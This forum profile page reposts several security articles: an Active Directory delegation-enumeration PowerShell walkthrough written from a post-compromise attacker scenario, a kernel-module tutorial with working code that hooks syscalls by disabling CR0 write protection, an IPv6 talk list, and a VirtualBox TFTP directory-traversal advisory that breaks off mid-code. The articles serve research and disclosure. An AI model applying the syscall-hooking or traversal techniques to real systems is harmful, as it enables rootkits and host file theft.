



Nytro last won the day on January 7

Nytro had the most liked content!

Community Reputation

3417 Excellent

About Nytro

  • Rank
  • Birthday 03/11/1991

Recent Profile Visitors

22204 profile views
  1. Nytro

    Coffee combined with energy drinks

    I abused energy drinks and it did not go well. I gave them up completely. Sleep is the foundation. Get as much of it as you can; it helps in many ways, and no substance can replace it.
  2. Nytro


    It depends on you. They are different things. A pentester is more on the "attacker" side, whereas a security analyst is more on the defense side.
  3. Hunting the Delegation Access

    January 17, 2019

    Active Directory (AD) delegation is a fascinating subject, and we have previously discussed it in a blog post and later in a webinar. To summarize, Active Directory can delegate certain rights to non-admin (domain/forest/enterprise) users so that they can perform administrative tasks over a specific section of AD. This capability, if misconfigured, can become a major reason for AD compromise. Earlier we only talked about manual analysis for finding such delegations. Another article, which can be found here, covered multiple other tools that can help with such manual analysis. Today, we are going to look at other options for hunting these delegations across a network in a (semi-)automated manner via scripts.

    Setting the scene

    We’ll assume the following scenario:

      • We have previously compromised a low-privilege domain user with severe restrictions, such as PowerShell execution disabled via AppLocker.
      • We have compromised local admin access on a domain-joined machine. This local admin access allows us to run unrestricted PowerShell scripts; however, we need the domain login to perform enumeration on the AD domain.

    To achieve that, we will use two different approaches:

      • Using ADACLScanner (semi-automated)
      • Using a custom PowerShell script by NSS (fully automated)

    Using ADACLScanner

    This tool is written by canix1 and is useful for generic ACL scanning. It can be found on GitHub (https://github.com/canix1/ADACLScanner). We can repurpose this tool for AD delegation hunting. We will explain the process with the help of an example.

    When you run the PowerShell script from ADACLScanner, you are greeted with a nice GUI (one of the rare PowerShell tools with a nice GUI).

    [Screenshot: ADACLScanner]

    So let’s say we connect to one of the AD domains, named “plum”, available at as shown in the screenshot below.
    [Screenshot: Connecting to AD]

    When we click Connect in the first column, we are prompted to enter a domain credential so that the tool can enumerate the node. Note that this can be the credential of any low-privilege user in the domain.

    [Screenshot: Requesting Domain Credentials]

    Once we enter the domain credentials correctly, we are shown the available nodes.

    [Screenshot: Listing AD Nodes]

    Now all we have to do is highlight the node in the first column, make sure inherited permissions is unticked, and click Run Scan. In the above scenario we selected the highest node, “DC=plum,DC=local”. The report generated after the scan completes looks roughly like this:

    [Screenshot: ACL Scanner Report]

    If we highlight the Regions node and run the scan, the report looks somewhat different. Notice that the Object column in the report gives the details of the node for which the ACL report has been extracted, so the OU here is Regions.

    [Screenshot: ACL Report for Regions OU]

    Similarly, if you run the scan for the USA OU from the Objects column, the report states the delegation permissions for the USA OU.

    [Screenshot: AD ACL Scanner report for OU USA]

    The hassle here is that you have to manually hunt every node and then analyze every entry to find the correct delegation. That is fine for a small network, but the task may become a nightmare on a large network. This is where our second approach is useful.

    Using Custom PowerShell Script by NSS

    Let me first show you the working of this script, which has been prepared by our team. If you are only concerned about the automated script, here is the online version of it; go and grab it. If you are interested in the internal working of the script, here is a block-by-block breakdown.

    Getting User Credentials and AD Drive Hack

    We started with a non-domain, but local admin, user. This is why we get the error listed below whenever we try to mount an AD drive or import the Active Directory module.
    [Screenshot: AD Module Import Error]

    To get around this, we passed the “-WarningAction SilentlyContinue” parameter. Let us dissect the script. The first bit reads as follows:

        Import-Module ActiveDirectory -WarningAction SilentlyContinue
        # force use of specified credentials everywhere
        $creds = Get-Credential
        $PSDefaultParameterValues = @{"*-AD*:Credential" = $creds}
        # GET DC Name
        $dcname = (Get-ADDomainController).Name
        New-PSDrive -Name AD -PSProvider ActiveDirectory -Server $dcname -Root //RootDSE/ -Credential $creds
        Set-Location AD:

    Here is what the commands above do:

      • Since we are performing actions as a non-domain user, we start by importing the “ActiveDirectory” module with “-WarningAction SilentlyContinue”. This imports the module, but the AD drive is not mounted.
      • Next we ask the user for credentials.
      • Once the credentials are supplied, we set “PSDefaultParameterValues” so that every command with “-AD” in its name uses them.
      • Finally we mount the AD drive with the newly acquired credential. For this we need a server name, which is obtained seamlessly using the “Get-ADDomainController” cmdlet.

    This would not be required if you are already logged in as a domain user. However, we wanted to take the worst-case scenario, where you have access to a system as a local admin (hence unrestricted PowerShell access) but only limited domain user credentials.
    Navigating Entire OU

    Get all domain names, organizational units, and individual AD objects:

        $OUs = @(Get-ADDomain | Select-Object -ExpandProperty DistinguishedName)
        $OUs += Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName
        $OUs += Get-ADObject -SearchBase (Get-ADDomain).DistinguishedName -SearchScope OneLevel -LDAPFilter '(objectClass=container)' | Select-Object -ExpandProperty DistinguishedName

    Let us understand what happens here. The first line executes “Get-ADDomain” and fetches the “DistinguishedName” property. The second line appends to $OUs the output of “Get-ADOrganizationalUnit” with the filter “*”, again taking the distinguished name of each object. The third line fetches the AD objects directly under the domain’s distinguished name (one level only), using an “LDAPFilter” that keeps objects whose class is container, and takes their “DistinguishedName” property.

    Adding Exclusions

        $domain = (Get-ADDomain).Name
        $groups_to_ignore = ( "$domain\Enterprise Admins", "$domain\Domain Admins")
        # 'NT AUTHORITY\SYSTEM', 'S-1-5-32-548', 'NT AUTHORITY\SELF'

    These lines show how we add exclusions to the list. We first fetch the domain name and then provide a list of groups to be ignored.

    Extracting Relevant Domain User/Group Permissions

        # $schemaIDGUID is used as a GUID-to-name lookup table; it is not defined in this excerpt
        ForEach ($OU in $OUs) {
            $report += Get-Acl -Path "AD:\$OU" |
                Select-Object -ExpandProperty Access |
                ? {$_.IdentityReference -match "$domain*" -and $_.IdentityReference -notin $groups_to_ignore} |
                Select-Object @{name='organizationalUnit';expression={$OU}}, `
                    @{name='objectTypeName';expression={if ($_.objectType.ToString() -eq '00000000-0000-0000-0000-000000000000') {'All'} Else {$schemaIDGUID.Item($_.objectType)}}}, `
                    @{name='inheritedObjectTypeName';expression={$schemaIDGUID.Item($_.inheritedObjectType)}}, `
                    *
        }

    As we saw previously in the second step (i.e.
    during navigation), we stored all the information in $OUs; here we use a “ForEach” loop to extract and process it. The first three lines in the ForEach loop fetch the ACL of every entity in $OUs and keep only the entries whose “IdentityReference” matches the domain and is not part of the groups-to-ignore list. The groups-to-ignore list can be seen in step 4. From line 4 onwards, the command selects properties: organizationalUnit, whose expression is the current entity from $OUs, and “ObjectTypeName”, which is “All” if the object type equals the root (all-zero) GUID and otherwise the name looked up in “SchemaIDGUID” for the object type value.

    Inheritance == False

    Inheritance being false is the key to everything. We need only the lines where inheritance is false.

        $filterrep = $report | Where-Object {-not $_.IsInherited}

    This ensures that inherited entries are not shown in the output.

    Array Conversion

    Array to Console Table

        Write-Output ( $filterrep | Select-Object OrganizationalUnit,ObjectTypeName,ActiveDirectoryRights,IdentityReference | Format-Table | Out-String)

    This finally results in a neatly formatted table listing the users that have any non-inherited, i.e. delegated, rights on specific objects. By default, delegated rights cascade down the OU tree, so if a top-level OU has the rights, they automatically cascade down to the next OU level unless explicitly removed.

    [Screenshot: Result of Automated Script]

    <shameless plug> This, and other such useful techniques, have been demonstrated in our latest Advanced Infrastructure Hacking course – 2019 edition. We also provide in-house training and CTFs for internal security and SOC teams to help them advance their skill sets. </shameless plug>

    Source: https://www.notsosecure.com/hunting-the-delegation-access/
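    The selection logic of the last two script steps (domain principal, not in the ignore list, not inherited) can be tried out without a domain. The following is only a sketch in Python: the `Ace` record, the `delegated_aces` helper and the sample entries are hypothetical stand-ins, not part of the NSS script or of any AD API. One deliberate difference: PowerShell's `-match` is a regular-expression match, so `"$domain*"` is not a wildcard prefix; the sketch uses an explicit `DOMAIN\` prefix test instead.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Ace:
    """Hypothetical, simplified stand-in for one AD access control entry."""
    organizational_unit: str
    identity: str       # e.g. "PLUM\\helpdesk"
    rights: str
    is_inherited: bool


def delegated_aces(aces, domain, ignore):
    """Keep explicit (non-inherited) ACEs held by domain principals not in `ignore`."""
    prefix = domain.upper() + "\\"
    ignored = {name.upper() for name in ignore}
    return [
        ace for ace in aces
        if ace.identity.upper().startswith(prefix)   # principal belongs to the domain
        and ace.identity.upper() not in ignored      # skip expected admin groups
        and not ace.is_inherited                     # only rights set on this object
    ]


# Made-up sample data for illustration only.
SAMPLE = [
    Ace("OU=USA,OU=Regions,DC=plum,DC=local", "PLUM\\helpdesk", "GenericAll", False),
    Ace("OU=USA,OU=Regions,DC=plum,DC=local", "PLUM\\Domain Admins", "GenericAll", False),
    Ace("OU=Regions,DC=plum,DC=local", "PLUM\\helpdesk", "ReadProperty", True),
    Ace("DC=plum,DC=local", "NT AUTHORITY\\SYSTEM", "GenericAll", False),
]
IGNORE = ["plum\\Enterprise Admins", "plum\\Domain Admins"]

if __name__ == "__main__":
    for ace in delegated_aces(SAMPLE, "plum", IGNORE):
        print(ace.organizational_unit, ace.identity, ace.rights)
```

    Only the explicit helpdesk entry on the USA OU survives the three conditions, which is the kind of row the script's final table is meant to surface.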
  4. How to write a rootkit without really trying

    January 17, 2019

    We open-sourced a fault injection tool, KRF, that uses kernel-space syscall interception. You can use it today to find faulty assumptions (and resultant bugs) in your programs. Check it out!

    This post covers intercepting system calls from within the Linux kernel, via a plain old kernel module. We’ll go through a quick refresher on syscalls and why we might want to intercept them and then demonstrate a bare-bones module that intercepts the read(2) syscall.

    But first, you might be wondering:

    What makes this any different from $other_fault_injection_strategy?

    Other fault injection tools rely on a few different techniques:

      • There’s the well-known LD_PRELOAD trick, which really intercepts the syscall wrapper exposed by libc (or your language runtime of choice). This often works (and can be extremely useful for e.g. spoofing the system time within a program or using SOCKS proxies transparently), but comes with some major downsides:
          • LD_PRELOAD only works when libc (or the target library of choice) has been dynamically linked, but newer languages (read: Go) and deployment trends (read: fully static builds and non-glibc Linux containers) have made dynamic linkage less popular.
          • Syscall wrappers frequently deviate significantly from their underlying syscalls: depending on your versions of Linux and glibc open() may call openat(2), fork() may call clone(2), and other calls may modify their flags or default behavior for POSIX compliance. As a result, it can be difficult to reliably predict whether a given syscall wrapper invokes its syscall namesake.
      • Dynamic instrumentation frameworks like DynamoRIO or Intel PIN can be used to identify system calls at either the function or machine-code level and instrument their calls and/or returns. While this grants us fine-grained access to individual calls, it usually comes with substantial runtime overhead.
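    To see why wrapper-level interception is incomplete, it helps to reach the kernel without going through the named libc wrapper. The sketch below is a Python illustration, not something from the original post: it calls getpid through libc's generic syscall(2) entry point via `ctypes`. The syscall numbers in `SYS_GETPID` are an assumed, deliberately small table for 64-bit Linux; on any other platform the helper simply returns None.

```python
import ctypes
import os
import platform
import sys

# getpid syscall numbers for two 64-bit Linux ABIs (assumed subset, not exhaustive).
SYS_GETPID = {"x86_64": 39, "aarch64": 172}


def raw_getpid():
    """Call getpid via syscall(2) directly; return None where this sketch does not apply."""
    if not sys.platform.startswith("linux"):
        return None
    if ctypes.sizeof(ctypes.c_void_p) != 8:
        return None  # 32-bit processes use different syscall numbers
    number = SYS_GETPID.get(platform.machine())
    if number is None:
        return None
    libc = ctypes.CDLL(None, use_errno=True)
    libc.syscall.restype = ctypes.c_long
    libc.syscall.argtypes = [ctypes.c_long]
    return libc.syscall(number)


if __name__ == "__main__":
    print("wrapper:", os.getpid(), "raw syscall:", raw_getpid())
```

    An LD_PRELOAD shim that only overrides the `getpid` symbol would never see the second call, while an interceptor sitting in the kernel's syscall table would see both.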
    Injecting faults within kernelspace sidesteps the downsides of both of these approaches: it rewrites the actual syscalls directly instead of relying on the dynamic loader, and it adds virtually no runtime overhead (beyond checking to see whether a given syscall is one we’d like to fault).

    What makes this any different from $other_blog_post_on_syscall_interception?

    Other blog posts address the interception of syscalls, but many:

      • Grab the syscall table by parsing their kernel’s System.map, which can be unreliable (and is slower than the approach we give below).
      • Assume that the kernel exports sys_call_table and that extern void *sys_call_table will work (not true on Linux 2.6+).
      • Involve prodding large ranges of kernel memory, which is slow and probably dangerous.

    Basically, we couldn’t find a recent (>2015) blog post that described a syscall interception process that we liked. So we developed our own.

    Why not just use eBPF or kprobes?

    eBPF can’t intercept syscalls. It can only record their parameters and return types. The kprobes API might be able to perform interception from within a kernel module, although I haven’t come across a really good source of information about it online. In any case, the point here is to do it ourselves!

    Will this work on $architecture?

    For the most part, yes. You’ll need to make some adjustments to the write-unlocking macro for non-x86 platforms.

    What’s a syscall?

    A syscall, or system call, is a function[1] that exposes some kernel-managed resource (I/O, process control, networking, peripherals) to user-space processes. Any program that takes user input, communicates with other programs, changes files on disk, uses the system time, or contacts another device over a network (usually) does so via syscalls.[2]

    The core UNIX-y syscalls are fairly primitive: open(2), close(2), read(2), and write(2) for the vast majority of I/O; fork(2), kill(2), signal(2), exit(2), and wait(2) for process management; and so forth.
    The socket management syscalls are mostly bolted on to the UNIX model: send(2) and recv(2) behave much like read(2) and write(2), but with additional transmission flags. ioctl(2) is the kernel’s garbage dump, overloaded to perform every conceivable operation on a file descriptor where no simpler means exists. Despite these additional complexities in usage, the underlying principle behind their usage (and interception) remains the same. If you’d like to dive all the way in, Filippo Valsorda maintains an excellent Linux syscall reference for x86 and x86_64.

    Unlike regular function calls in user-space, syscalls are extraordinarily expensive: on x86 architectures, int 80h (or the more modern sysenter/syscall instructions) causes both the CPU and the kernel to execute slow interrupt-handling code paths as well as perform a privilege-context switch.[3]

    Why intercept syscalls?

    For a few different reasons:

      • We’re interested in gathering statistics about a given syscall’s usage, beyond what eBPF or another instrumentation API could (easily) provide.
      • We’re interested in fault injection that can’t be avoided by static linking or manual syscall(3) invocations (our use case).
      • We’re feeling malicious, and we want to write a rootkit that’s hard to remove from user-space (and possibly even kernel-space, with a few tricks).[4]

    Why do I need fault injection?

    Fault injection finds bugs in places that fuzzing and conventional unit testing often won’t:

      • NULL dereferences caused by assuming that particular functions never fail (are you sure you always check whether getcwd(2) succeeds?) Are you sure that you’re doing better than systemd?
      • Memory corruption caused by unexpectedly small buffers, or disclosure caused by unexpectedly large buffers
      • Integer over/underflow caused by invalid or unexpected values (are you sure you’re not making incorrect assumptions about stat(2)’s atime/mtime/ctime fields?)
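    The first bug class in the list above is easy to reproduce in miniature. The following Python sketch is a user-space analogue only: it forces `os.getcwd` to fail with `unittest.mock`, which is language-level mocking and not the kernel-space technique this post describes. The function names are made up for the illustration.

```python
import os
from unittest import mock


def describe_cwd():
    """Return the working directory, or a placeholder if the lookup fails."""
    try:
        return os.getcwd()
    except OSError:
        # Without this branch, an injected failure would crash the caller.
        return "<unknown>"


def describe_cwd_under_fault():
    """Run describe_cwd() while os.getcwd is forced to raise (simulated fault)."""
    failure = OSError(2, "No such file or directory")
    with mock.patch("os.getcwd", side_effect=failure):
        return describe_cwd()


if __name__ == "__main__":
    print("normal:", describe_cwd())
    print("faulted:", describe_cwd_under_fault())
```

    Code that skips the `except OSError` branch passes every ordinary test and only fails once the fault is injected, which is the kind of assumption fault injection is meant to flush out.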
    Getting started: Finding the syscall table

    Internally, the Linux kernel stores syscalls within the syscall table, an array of __NR_syscalls pointers. This table is defined as sys_call_table, but has not been directly exposed as a symbol (to kernel modules) since Linux 2.5.

    First thing, we need to get the syscall table’s address, ideally without using the System.map file or scanning kernel memory for well-known addresses. Luckily for us, Linux provides an interface superior to either of these: kallsyms_lookup_name.

    This makes retrieving the syscall table as easy as:

        #include <linux/kallsyms.h>
        #include <linux/kernel.h>
        #include <linux/module.h>

        /* kallsyms_lookup_name is a GPL-only export */
        MODULE_LICENSE("GPL");

        static unsigned long *sys_call_table;

        int init_module(void) {
          sys_call_table = (void *)kallsyms_lookup_name("sys_call_table");

          if (sys_call_table == NULL) {
            printk(KERN_ERR "Couldn't look up sys_call_table\n");
            return -1;
          }

          return 0;
        }

    Of course, this only works if your Linux kernel was compiled with CONFIG_KALLSYMS=y. Debian and Ubuntu provide this, but you may need to test in other distros. If your distro doesn’t enable kallsyms by default, consider using a VM for one that does (you weren’t going to test this code on your host, were you?).

    Injecting our replacement syscalls

    Now that we have the kernel’s syscall table, injecting our replacement should be as easy as:

        static unsigned long *sys_call_table;
        static typeof(sys_read) *orig_read;

        /* asmlinkage is important here -- the kernel expects syscall parameters to be
         * on the stack at this point, not inside registers.
         */
        asmlinkage long phony_read(int fd, char __user *buf, size_t count) {
          /* %zu is the correct format specifier for size_t */
          printk(KERN_INFO "Intercepted read of fd=%d, %zu bytes\n", fd, count);

          return orig_read(fd, buf, count);
        }

        int init_module(void) {
          sys_call_table = (void *)kallsyms_lookup_name("sys_call_table");

          if (sys_call_table == NULL) {
            printk(KERN_ERR "Couldn't look up sys_call_table\n");
            return -1;
          }

          /* table entries are unsigned long, so cast the function pointers */
          orig_read = (typeof(sys_read) *)sys_call_table[__NR_read];
          sys_call_table[__NR_read] = (unsigned long)phony_read;

          return 0;
        }

        void cleanup_module(void) {
          /* Don't forget to fix the syscall table on module unload, or you'll be in
           * for a nasty surprise!
           */
          sys_call_table[__NR_read] = (unsigned long)orig_read;
        }

    …but it isn’t that easy, at least not on x86: sys_call_table is write-protected by the CPU itself. Attempting to modify it will cause a page fault (#PF) exception.[5] To get around this, we twiddle bit 16 (the WP flag) of the cr0 register, which controls the write-protect state:

        #define CR0_WRITE_UNLOCK(x) \
          do { \
            write_cr0(read_cr0() & (~X86_CR0_WP)); \
            x; \
            write_cr0(read_cr0() | X86_CR0_WP); \
          } while (0)

    Then, our insertions become a matter of:

        CR0_WRITE_UNLOCK({
          sys_call_table[__NR_read] = (unsigned long)phony_read;
        });

    and:

        CR0_WRITE_UNLOCK({
          sys_call_table[__NR_read] = (unsigned long)orig_read;
        });

    and everything works as expected…almost.

    We’ve assumed a single processor; there’s an SMP-related race condition bug in the way we twiddle cr0. If our kernel task were preempted immediately after disabling write-protect and placed onto another core with WP still enabled, we’d get a page fault instead of a successful memory write.
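    The mask arithmetic inside CR0_WRITE_UNLOCK can be checked in isolation. The Python sketch below only does the integer math; it does not touch any register. `X86_CR0_WP` is bit 16 counting from zero, and `EXAMPLE_CR0` is an assumed, typical-looking value chosen for illustration.

```python
X86_CR0_WP = 1 << 16  # write-protect flag: bit 16 of CR0, counting from zero

EXAMPLE_CR0 = 0x80050033  # assumed sample value with WP set (illustration only)


def clear_wp(cr0):
    """Mirror of `read_cr0() & (~X86_CR0_WP)`: drop the write-protect flag."""
    return cr0 & ~X86_CR0_WP


def set_wp(cr0):
    """Mirror of `read_cr0() | X86_CR0_WP`: restore the write-protect flag."""
    return cr0 | X86_CR0_WP


if __name__ == "__main__":
    unlocked = clear_wp(EXAMPLE_CR0)
    print(hex(EXAMPLE_CR0), "->", hex(unlocked), "->", hex(set_wp(unlocked)))
```

    Only one bit changes between the locked and unlocked values, and setting it again restores the original word, so every other CR0 flag is left untouched.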
    The chances of this race occurring are pretty slim, but it doesn’t hurt to be careful by implementing a guard around the critical section:

        #define CR0_WRITE_UNLOCK(x) \
          do { \
            unsigned long __cr0; \
            preempt_disable(); \
            __cr0 = read_cr0() & (~X86_CR0_WP); \
            BUG_ON(unlikely((__cr0 & X86_CR0_WP))); \
            write_cr0(__cr0); \
            x; \
            __cr0 = read_cr0() | X86_CR0_WP; \
            BUG_ON(unlikely(!(__cr0 & X86_CR0_WP))); \
            write_cr0(__cr0); \
            preempt_enable(); \
          } while (0)

    (The astute will notice that this is almost identical to the “rare write” mechanism from PaX/grsecurity. This is not a coincidence: it’s based on it!)

    What’s next?

    The phony_read above just wraps the real sys_read and adds a printk, but we could just as easily have it inject a fault:

        asmlinkage long phony_read(int fd, char __user *buf, size_t count) {
          return -ENOSYS;
        }

    …or a fault for a particular user:

        asmlinkage long phony_read(int fd, char __user *buf, size_t count) {
          if (current_uid().val == 1005) {
            return -ENOSYS;
          } else {
            return orig_read(fd, buf, count);
          }
        }

    …or return bogus data:

        asmlinkage long phony_read(int fd, char __user *buf, size_t count) {
          unsigned char kbuf[1024];
          /* never write more than the caller's buffer can hold */
          size_t len = min(count, sizeof(kbuf));

          memset(kbuf, 'A', sizeof(kbuf));
          if (copy_to_user(buf, kbuf, len))
            return -EFAULT;

          return len;
        }

    Syscalls happen under task context within the kernel, meaning that the current task_struct is valid. Opportunities for poking through kernel structures abound!

    Wrap up

    This post covers the very basics of kernel-space syscall interception. To do anything really interesting (like precise fault injection or statistics beyond those provided by official introspection APIs), you’ll need to read a good kernel module programming guide[6] and do the legwork yourself.
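    The save, replace, restore pattern used throughout this post can be modelled without a kernel. The following Python sketch is a toy under stated assumptions: `ToySyscallTable`, `real_read` and `make_faulty_read` are hypothetical names, and the "syscall" takes the caller's uid as an explicit argument instead of reading it from a task structure.

```python
import errno


def real_read(uid, fd, count):
    """Stand-in for the original handler: pretend `count` bytes were read."""
    return count


class ToySyscallTable:
    """Dictionary-backed model of a syscall table with hook/unhook support."""

    def __init__(self):
        self.table = {"read": real_read}
        self._saved = {}

    def hook(self, name, replacement):
        # Remember the original entry so it can be restored on "module unload".
        self._saved[name] = self.table[name]
        self.table[name] = replacement

    def unhook(self, name):
        self.table[name] = self._saved.pop(name)


def make_faulty_read(orig, target_uid):
    """Build a replacement that faults one user and defers to `orig` for the rest."""
    def phony_read(uid, fd, count):
        if uid == target_uid:
            return -errno.ENOSYS
        return orig(uid, fd, count)
    return phony_read


if __name__ == "__main__":
    syscalls = ToySyscallTable()
    syscalls.hook("read", make_faulty_read(syscalls.table["read"], 1005))
    print(syscalls.table["read"](1005, 0, 16), syscalls.table["read"](1000, 0, 16))
    syscalls.unhook("read")
```

    The important detail carried over from the kernel version is that the original entry is captured before the table is modified and put back on unhook.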
    Our new tool, KRF, does everything mentioned above and more: it can intercept and fault syscalls with per-executable precision, operate on an entire syscall “profile” (e.g., all syscalls that touch the filesystem or perform process scheduling), and can fault in real-time without breaking a sweat. Oh, and static linkage doesn’t bother it one bit: if your program makes any syscalls, KRF will happily fault them.

    Other work

    Outside of kprobes for kernel-space interception and LD_PRELOAD for user-space interception of wrappers, there are a few other clever tricks out there:

      • syscall_intercept is loaded through LD_PRELOAD like a normal wrapper interceptor, but actually uses capstone internally to disassemble (g)libc and instrument the syscalls that it makes. This only works on syscalls made by the libc wrappers, but it’s still pretty cool.
      • ptrace(2) can be used to instrument syscalls made by a child process, all within user-space. It comes with two considerable downsides, though: it can’t be used in conjunction with a debugger, and it returns (PTRACE_GETREGS) architecture-specific state on each syscall entry and exit. It’s also slow. Chris Wellons’s awesome blog post covers ptrace(2)’s many abilities.

    Footnotes

      [1] More of a “service request” than a “function” in the ABI sense, but thinking about syscalls as a special class of functions is a serviceable-enough fabrication.
      [2] The number of exceptions to this continues to grow, including user-space networking stacks and the Linux kernel’s vDSO for many frequently called syscalls, like time(2).
      [3] No process context switch is necessary. Linux executes syscalls within the same underlying kernel task that the process belongs to. But a processor context switch does occur.
      [4] I won’t detail this because it’s outside of this post’s scope, but consider that init_module(2) and delete_module(2) are just normal syscalls.
      [5] Sidenote: this is actually how CoW works on Linux. fork(2) write-protects the pre-duplicated process space, and the kernel waits for the corresponding page fault to tell it to copy a page to the child.
      [6] This one’s over a decade old, but it covers the basics well. If you run into missing symbols or changed signatures, you should find the current equivalents with a quick search.

    Source: https://blog.trailofbits.com/2019/01/17/how-to-write-a-rootkit-without-really-trying/
  5. IPv6 Talks & Publications

    First of all, a very happy new year to everybody! While thinking about the agenda of the upcoming Troopers NGI IPv6 Track I realized that quite a lot of IPv6-related topics have been covered in the last years by various IPv6 practitioners (like my colleague Christopher Werny) or researchers (like my friend Antonios Atlasis). In a kind of shameless self plug I then decided to put together a list of IPv6 talks I myself gave on several occasions and of publications I (co-)authored. Please find this list below (sorted by year); you can click on the titles to access the respective documents/sources. I hope some of this can be of help to some of you in the course of your own IPv6 efforts.

    Cheers, Enno

    2018 IPv6 Address Management – The First Five Years Properties of IPv6 and Their Implications for Offense & Defense 2017 Why it might make sense to use IPv6 in enterprise infrastructure projects Position Paper on an Enterprise Organization’s IPv6 Address Strategy Balanced Security for IPv6 CPE Revisited Local Packet Filtering with IPv6 IPv6 Address Selection – A Look from the Lab Why IPv6 Security Is So Hard – Structural Deficits of IPv6 & Their Implications Testing RFC 6980 Implementations with Chiron IPv6 configuration approaches for servers / slides with additional infos IPv6 Properties of Windows Server 2016 / Windows 10 2016 Real Life Use Cases and Challenges When Implementing Link-local Addressing Only Networks as of RFC 7404 IPv6 from a Developers’ Perspective Things to Consider When Deploying IPv6 in Enterprise Space IPv6 & Threat Intelligence Protecting Hosts in IPv6 Networks Remote Access and Business Partner Connections Developing an Enterprise IPv6 Security Strategy Dual Stack vs.
IPv6-only in Enterprise Networks Things to Consider When Starting Your IPv6 Deployment IPv6 Address Planning in 2016 / Observations 2015 Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security Developing an Enterprise IPv6 Security Strategy / Part 2: Network Isolation on the Routing Layer Developing an Enterprise IPv6 Security Strategy / Part 3: Traffic Filtering in IPv6 Networks (I) Developing an Enterprise IPv6 Security Strategy / Part 4: Traffic Filtering in IPv6 Networks (II) Developing an Enterprise IPv6 Security Strategy / Part 5: First Hop Security Features Developing an Enterprise IPv6 Security Strategy / Part 6: Controls on the Host Level Some Notes on the “Drop IPv6 Fragments” vs. “This Will Break DNS[SEC]” Debate IPv6 Router Advertisement Flags, RDNSS and DHCPv6 Conflicting Configurations Main IPv6 Related Mailing Lists IPv6 in Virtualized Data Centers The Strange Case of $SOME_SOFTWARE Adding an IPv6 Extension Header, and an Internet Router Dropping Them Will It Be Routed? Evasion of Cisco ACLs by (Ab)Using IPv6 IPv6 Address Planning / Some Notes OS IPv6 Behavior in Conflicting Environments What to Do Today if You Want to Deploy IPv6 Tomorrow Is IPv6 more Secure than IPv4? Or Less? IPv6 & Complexity MLD Considered Harmful Reliable & Secure DHCPv6 IPv6-related Requirements for the Internet Uplink or MPLS Networks An MLD Testing Methodology Is RFC 6939 Support Finally Here – Checking the Implementation of the “Client Link Layer Address Option” in DHCPv6 /48 Considered Harmful. 
On the Interaction of Strict IPv6 Prefix Filtering and the Needs of Enterprise LIRs The Persistent Problem of State in IPv6 (Security) IPv6-related Requirements for Security Devices Evaluation of IPv6 Capabilities of Commercial IPAM Solutions 2014 Security Implications of Using IPv6 GUAs Only Dynamics of IPv6 Prefixes within the LIR Scope in the RIPE NCC Region Evasion of High-End IDPS Devices at the IPv6 Era IPv6 in RFIs/Tendering Processes Protocol Properties & Attack Vectors Router Advertisement Options to the Rescue – A Deep Dive into DHCPv6, Part 2 I Don’t Have Any Neighbors – A Deep Dive into DHCPv6, Part 1 Security Implications of Disruptive Technologies IPv6 for Managers IPv6 Requirements for Cloud Service Providers IPv6 Address Plan Considerations, Part 3: The Plan IPv6 Address Plan Considerations, Part 2: The “PI Space from (Single|Multiple) RIR(s) Debate” IPv6 Address Plan Considerations, Part 1: General Guidelines 2013 Design & Configuration of IPv6 Segments with High Security Requirements IPv6 Capabilities of Commercial Security Components IPAM Requirements in IPv6 Networks IPv6 Neighbor Cache Exhaustion Attacks – Risk Assessment & Mitigation Strategies, Part 1 2012 IPv6 Privacy Extensions 2011 Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt IPv6 Security Part 2, RA Guard – Let’s get practical IPv6 Security Part 1, RA Guard – The Theory

    Source: https://insinuator.net/2019/01/ipv6-talks-publications/
  6. VirtualBox TFTP server (PXE boot) directory traversal and heap overflow vulnerabilities - [CVE-2019-2552, CVE-2019-2553]

    In my previous blog post I wrote about VirtualBox DHCP bugs which can be triggered from an unprivileged guest user, in the default configuration and without Guest Additions installed. TFTP server for PXE boot is another attack surface which can be reached from the same configuration. VirtualBox in NAT mode (default configuration) runs a read only TFTP server in the IP address to support PXE boot.

    CVE-2019-2553 - Directory traversal vulnerability

    The source code of the TFTP server is at src/VBox/Devices/Network/slirp/tftp.c and it is based on the TFTP server used in QEMU. The below comment can be found in the source:

        * This code is based on:
        *
        * tftp.c - a simple, read-only tftp server for qemu

    The guest provided file path is validated using the function tftpSecurityFilenameCheck() as below:

        /**
         * This function evaluate file name.
         * @param pu8Payload
         * @param cbPayload
         * @param cbFileName
         * @return VINF_SUCCESS -
         *         VERR_INVALID_PARAMETER -
         */
        DECLINLINE(int) tftpSecurityFilenameCheck(PNATState pData, PCTFTPSESSION pcTftpSession)
        {
            size_t cbSessionFilename = 0;
            int rc = VINF_SUCCESS;
            AssertPtrReturn(pcTftpSession, VERR_INVALID_PARAMETER);
            cbSessionFilename = RTStrNLen((const char *)pcTftpSession->pszFilename, TFTP_FILENAME_MAX);
            if (   !RTStrNCmp((const char*)pcTftpSession->pszFilename, "../", 3)
                || (pcTftpSession->pszFilename[cbSessionFilename - 1] == '/')
                || RTStrStr((const char *)pcTftpSession->pszFilename, "/../"))
                rc = VERR_FILE_NOT_FOUND;

            /* only allow exported prefixes */
            if (   RT_SUCCESS(rc)
                && !tftp_prefix)
                rc = VERR_INTERNAL_ERROR;
            LogFlowFuncLeaveRC(rc);
            return rc;
        }

    This code again is based on the validation done in QEMU (slirp/tftp.c):

        /* do sanity checks on the filename */
        if (!strncmp(req_fname, "../", 3) ||
            req_fname[strlen(req_fname) - 1] == '/' ||
            strstr(req_fname, "/../")) {
            tftp_send_error(spt, 2, "Access violation", tp);
            return;
        }

    Interesting observation here is, above validation done in QEMU is specific to Linux hosts. However, VirtualBox relies on the same validation for Windows hosts too. Since backslash can be used as directory separator in Windows, validations done in tftpSecurityFilenameCheck() can be bypassed to read host files accessible under the privileges of the VirtualBox process. The default path to TFTP root folder is C:\Users\\.VirtualBox\TFTP. Payload to read other files from the host needs to be crafted accordingly.

    [Demo video]

    CVE-2019-2552 - Heap overflow due to incorrect validation of TFTP blocksize option

    The function tftpSessionOptionParse() sets the value of TFTP options:

        DECLINLINE(int) tftpSessionOptionParse(PTFTPSESSION pTftpSession, PCTFTPIPHDR pcTftpIpHeader)
        {
            ...
            else if (fWithArg)
            {
                if (!RTStrICmp("blksize", g_TftpDesc[idxOptionArg].pszName))
                {
                    rc = tftpSessionParseAndMarkOption(pszTftpRRQRaw, &pTftpSession->OptionBlkSize);
